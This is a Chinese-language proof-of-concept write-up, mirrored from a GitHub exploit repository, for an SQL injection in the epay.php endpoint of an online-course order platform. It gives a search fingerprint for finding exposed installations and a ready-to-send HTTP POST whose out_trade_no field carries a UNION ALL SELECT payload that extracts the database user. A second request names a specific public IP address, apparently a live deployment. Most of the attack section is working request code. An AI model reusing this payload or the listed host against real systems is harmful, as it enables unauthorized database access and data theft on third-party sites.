mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
56 lines
2.2 KiB
Markdown
56 lines
2.2 KiB
Markdown
# 网课交单平台epay存在SQL注入漏洞
|
||
|
||
# 一、漏洞简介
|
||
网课交单平台是一款和发卡网对接的网课代学平台,拥有聚合支付,论文编辑等功能,其后台的可用性及可靠性得到了使用者的认可。网课交单平台某接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
|
||
|
||
# 二、影响版本
|
||
+ 网课交单平台
|
||
|
||
# 三、资产测绘
|
||
```http
|
||
"/apisub.php"
|
||
```
|
||
|
||

|
||
|
||
# 四、漏洞复现
|
||
```java
|
||
POST /epay/epay.php HTTP/1.1
|
||
Host:
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate, br
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 157
|
||
Connection: keep-alive
|
||
Upgrade-Insecure-Requests: 1
|
||
Priority: u=1
|
||
|
||
out_trade_no=' UNION ALL SELECT 1,CONCAT(IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),3,4,5,6,7,8,9,10,11,12,13-- -
|
||
```
|
||
|
||

|
||
|
||
```java
|
||
POST /epay/epay.php HTTP/1.1
|
||
Host: 101.33.219.180:89
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate, br
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 157
|
||
Connection: keep-alive
|
||
Upgrade-Insecure-Requests: 1
|
||
Priority: u=1
|
||
|
||
out_trade_no=1
|
||
```
|
||
|
||

|
||
|
||
|
||
|
||
> 更新: 2024-06-17 09:30:05
|
||
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/na3widtrnccyuruh> |